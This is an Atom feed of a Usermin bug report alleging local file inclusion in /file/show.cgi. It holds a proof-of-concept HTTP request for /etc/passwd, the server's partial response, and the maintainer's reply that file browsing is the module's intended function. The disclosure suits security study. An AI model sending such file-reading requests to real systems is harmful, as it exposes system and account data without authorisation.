<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en" xmlns="http://www.w3.org/2005/Atom"><title>Recent changes to 480: Local File Inclusion in /file/show.cgi/</title><link href="https://sourceforge.net/p/webadmin/usermin-bugs/480/" rel="alternate"/><link href="https://sourceforge.net/p/webadmin/usermin-bugs/480/feed.atom" rel="self"/><id>https://sourceforge.net/p/webadmin/usermin-bugs/480/</id><updated>2019-10-21T19:57:53.581000Z</updated><subtitle>Recent changes to 480: Local File Inclusion in /file/show.cgi/</subtitle><entry><title>#480 Local File Inclusion in /file/show.cgi/</title><link href="https://sourceforge.net/p/webadmin/usermin-bugs/480/?limit=25#5207" rel="alternate"/><published>2019-10-21T19:57:53.581000Z</published><updated>2019-10-21T19:57:53.581000Z</updated><author><name>Jamie Cameron</name><uri>https://sourceforge.net/u/jcameron/</uri></author><id>https://sourceforge.netade6ade3698570af12886b8e1ce424fec07a3cf1</id><summary type="html">&lt;div class="markdown_content"&gt;&lt;p&gt;I don't see how that's a vulnerability - the while point of the file manager module is to allow users to browse files on the server.&lt;/p&gt;&lt;/div&gt;</summary></entry><entry><title>Local File Inclusion in /file/show.cgi/</title><link href="https://sourceforge.net/p/webadmin/usermin-bugs/480/" rel="alternate"/><published>2019-10-21T10:24:41.997000Z</published><updated>2019-10-21T10:24:41.997000Z</updated><author><name>Peter</name><uri>https://sourceforge.net/u/inf0seq/</uri></author><id>https://sourceforge.net6412b0b6d461fbbe6eb35ec935587c670ae72d62</id><summary type="html">&lt;div class="markdown_content"&gt;&lt;p&gt;Low-privileged user can exploit a local file include vulnerability. It is possible to retrieve configuration files from the remote system.&lt;/p&gt;
&lt;p&gt;Proof-of-Concept:&lt;/p&gt;
&lt;p&gt;GET /file/show.cgi/etc/passwd HTTP/1.1&lt;br/&gt;
Host: 10.0.0.5:20000&lt;br/&gt;
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0&lt;br/&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,&lt;em&gt;/&lt;/em&gt;;q=0.8&lt;br/&gt;
Accept-Language: en-US,en;q=0.5&lt;br/&gt;
Accept-Encoding: gzip, deflate&lt;br/&gt;
Connection: close&lt;br/&gt;
Cookie: redirect=1; testing=1; usid=b13f01f0151e6eea18ed9994bd77393f&lt;br/&gt;
Upgrade-Insecure-Requests: 1&lt;/p&gt;
&lt;p&gt;HTTP/1.0 200 Document follows&lt;br/&gt;
Date: Mon, 21 Oct 2019 06:41:42 GMT&lt;br/&gt;
Server: MiniServ/1.780&lt;br/&gt;
Connection: close&lt;br/&gt;
X-no-links: 1&lt;br/&gt;
Content-length: 2485&lt;br/&gt;
X-Content-Type-Options: nosniff&lt;br/&gt;
Content-type: text/plain; charset=windows-1251&lt;/p&gt;
&lt;p&gt;root❌0:0:root:/root:/bin/bash&lt;br/&gt;
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin&lt;br/&gt;
bin❌2:2:bin:/bin:/usr/sbin/nologin&lt;br/&gt;
sys❌3:3:sys:/dev:/usr/sbin/nologin&lt;br/&gt;
sync❌4:65534:sync:/bin:/bin/sync&lt;br/&gt;
games❌5:60:games:/usr/games:/usr/sbin/nologin&lt;br/&gt;
man❌6:12:man:/var/cache/man:/usr/sbin/nologin&lt;br/&gt;
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin&lt;br/&gt;
&lt;span&gt;[...]&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</summary></entry></feed>